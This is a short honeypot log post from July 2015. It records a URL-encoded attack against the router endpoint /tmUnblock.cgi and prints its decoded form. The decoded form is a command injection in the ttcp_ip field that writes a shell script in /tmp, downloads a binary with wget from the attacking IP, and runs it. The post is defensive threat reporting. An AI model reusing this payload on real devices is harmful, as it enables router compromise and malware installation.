Freitag, 17. Juli 2015

Encoded NTTPD atack from 149.129.69.111

Earlier today my honeypot (new version by the way), received an encoded attack

2015-07-17 19:04:14
Source IP: 149.129.69.111
Country: MY RiskScore: 1 Malware: []
POST /tmUnblock.cgi HTTP/1.1
content-length: 946

%73%75%62%6d%69%74%5f%62%75%74%74%6f%6e%3d&%63%68%61%6e%67%65%5f%61%63%74%69%6f%6e%3d&%61%63%74%69%6f%6e%3d&%63%6f%6d%6d%69%74%3d&%74%74%63%70%5f%6e%75%6d%3d%32&%74%74%63%70%5f%73%69%7a%65%3d%32&%74%74%63%70%5f%69%70%3d%2d%68%20%60%63%64%20%2f%74%6d%70%3b%65%63%68%6f%20%22%23%21%2f%62%69%6e%2f%73%68%22%20%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%72%6d%20%2d%66%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%77%67%65%74%20%2d%4f%20%2e%6e%74%74%70%64%20%68%74%74%70%3a%2f%2f%31%34%39%2e%31%32%39%2e%36%39%2e%31%31%31%3a%33%33%34%34%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%65%63%68%6f%20%22%2e%2f%2e%6e%74%74%70%64%22%20%3e%3e%20%2e%6e%74%74%70%64%2e%73%68%3b%63%68%6d%6f%64%20%2b%78%20%2e%6e%74%74%70%64%2e%73%68%3b%2e%2f%2e%6e%74%74%70%64%2e%73%68%60&%53%74%61%72%74%45%50%49%3d%31
The encoded string decodes to
 submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `cd /tmp;echo "#!/bin/sh" > .nttpd.sh;echo "rm -f .nttpd" >> .nttpd.sh;echo "wget -O .nttpd http://149.129.69.111:3344" >> .nttpd.sh;echo "chmod +x .nttpd" >> .nttpd.sh;echo "./.nttpd" >> .nttpd.sh;chmod +x .nttpd.sh;./.nttpd.sh`&StartEPI=1

 The software cant be downloaded currently, as the IP address is not responding. Best guess is that the attack tried to install a open directory web server.